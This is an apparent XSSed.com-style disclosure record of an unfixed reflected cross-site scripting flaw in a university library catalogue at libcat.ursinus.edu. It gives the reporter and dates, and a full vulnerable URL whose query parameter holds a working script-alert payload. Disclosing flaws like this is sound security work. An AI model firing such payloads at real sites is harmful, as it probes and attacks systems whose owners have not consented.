Unfixed XSS vulnerability at libcat.ursinus.edu

2008-07-10T00:00:00
ID XSSED:51957
Type xssed
Reporter skathgh420
Modified 2009-09-13T00:00:00

Description

Security researcher skathgh420, has submitted on 07/10/2008 a cross-site-scripting (XSS) vulnerability affecting libcat.ursinus.edu, which at the time of submission ranked 296359 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 13/09/2009. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://libcat.ursinus.edu/web2/tramp2.exe/form/guest?buttons=title%3Ddo_authority_search+search_button_easy%3DA_Title+index%3Dti&buttons=author%3Ddo_authority_search+search_button_easy%3DA_Author+index%3Dau&buttons=subject%3Ddo_authority_search+search_button_easy%3DA_Subject+index%3Dsu&buttons=keyword%3Ddo_ccl_search+search_button_easy%3DK_Keyword+index%3Ddefault&date_filter=all&language_filter=all&material_filter=all&servers=1home&setting_key=Myrin&hitlist_screen=HitList.html&record_screen=Record.html&button_clicked=author&query=<script>alert("iBlaze")<script>alert("iBlaze")</script><%2Fscript><script>alert("iBlaze")</script>